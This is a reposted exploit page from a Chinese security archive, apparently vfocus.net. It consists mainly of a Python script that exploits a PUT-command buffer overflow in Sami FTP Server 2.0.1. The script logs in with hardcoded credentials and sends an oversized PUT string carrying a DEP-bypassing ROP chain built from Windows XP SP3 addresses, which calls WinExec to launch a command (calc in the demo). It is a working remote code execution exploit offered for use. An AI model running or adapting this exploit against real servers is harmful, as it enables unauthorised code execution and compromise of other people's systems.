首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sami FTP Server 2.0.1 PUT Command Buffer Overflow
来源:vfocus.net 作者:ne0z 发布时间:2013-03-20  
#!/usr/bin/python
# Exploit Title: Sami FTP Server 2.0.1 PUT Command Buffer overflow (DEP Bypass)
# Date: 17 Mar 2013
# Exploit Author: ne0z
# Vendor Homepage: http://www.hatsecure.com
# Version: Sami FTP Server 2.0.1
# Tested on: Windows XP Professional SP3
# 
# Description :
# A buffer overflow is triggered when a long PUT command is sent to the
# server and the user views the Log tab. 
#
# Reference from : superkojiman

import socket, struct, sys

def little_endian(address):
	return struct.pack("<L",address)


if (len(sys.argv)<=1):
	print "Usage :"
	print "root@bt~: python samiftp.py [target] [port]"
	sys.exit(0)

target  = sys.argv[1]
port    = sys.argv[2]


fuzz 	= "\x41" * 216
eip	=  little_endian(0x7c9c1652)
rop	=  "AAAABBBBCCCCDDDD"	 #padding
rop 	+= little_endian(0x7E41E9F6) #POP EDI RETN
rop	+= little_endian(0x7E411069) #retn
rop 	+= little_endian(0x7E414238) #POP ESI #RETN (user32.dll)
rop 	+= little_endian(0x7c862509) #POP to ESI
for x in range(4):
	rop += little_endian(0x7C9CDA03) #inc esi #retn (0x7c862509 + 4) = 0x7C86250D (WinExec)
rop 	+= little_endian(0x7E4185BB) #POP EBP RETN
rop 	+= little_endian(0x7c81cb12) #Next address ExitProcess()
for x in range(3):
	rop += little_endian(0x7C81106F)
rop 	+= little_endian(0x7e423ad9) #pushad retn


cmd	= "calc  " #

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(target),int(port)))
s.recv(1024)
print "[X] Logged in"
s.send("USER hatsecure\r\n")
s.recv(1024)
s.send("PASS hatsecure\r\n")
s.recv(1024)
s.send("SYST\r\n")
system = s.recv(1024)
print "[X] Detected "+system
print "[X] Sending payload"
s.send("PUT "+fuzz+eip+rop+cmd+"\r\n")
s.recv(1024)

s.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sami FTP Server LIST Command B
·Cool PDF Image Stream Buffer O
·OpenPLI Webif Arbitrary Comman
·BlazeVideo HDTV Player 6.6.0.2
·Nitro Pro 8.0.3.1 - Crash PoC
·TP-Link TL-WR740N Wireless Rou
·Google Chrome 21.0.1180.57 NUL
·EastFTP ActiveX Control 0Day
·Fedora Linux SOCK_DIAG Local R
·Apache Struts ParametersInterc
·Ruby Gem Curl Command Executio
·Mageia Release 2 sock_diag_han
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved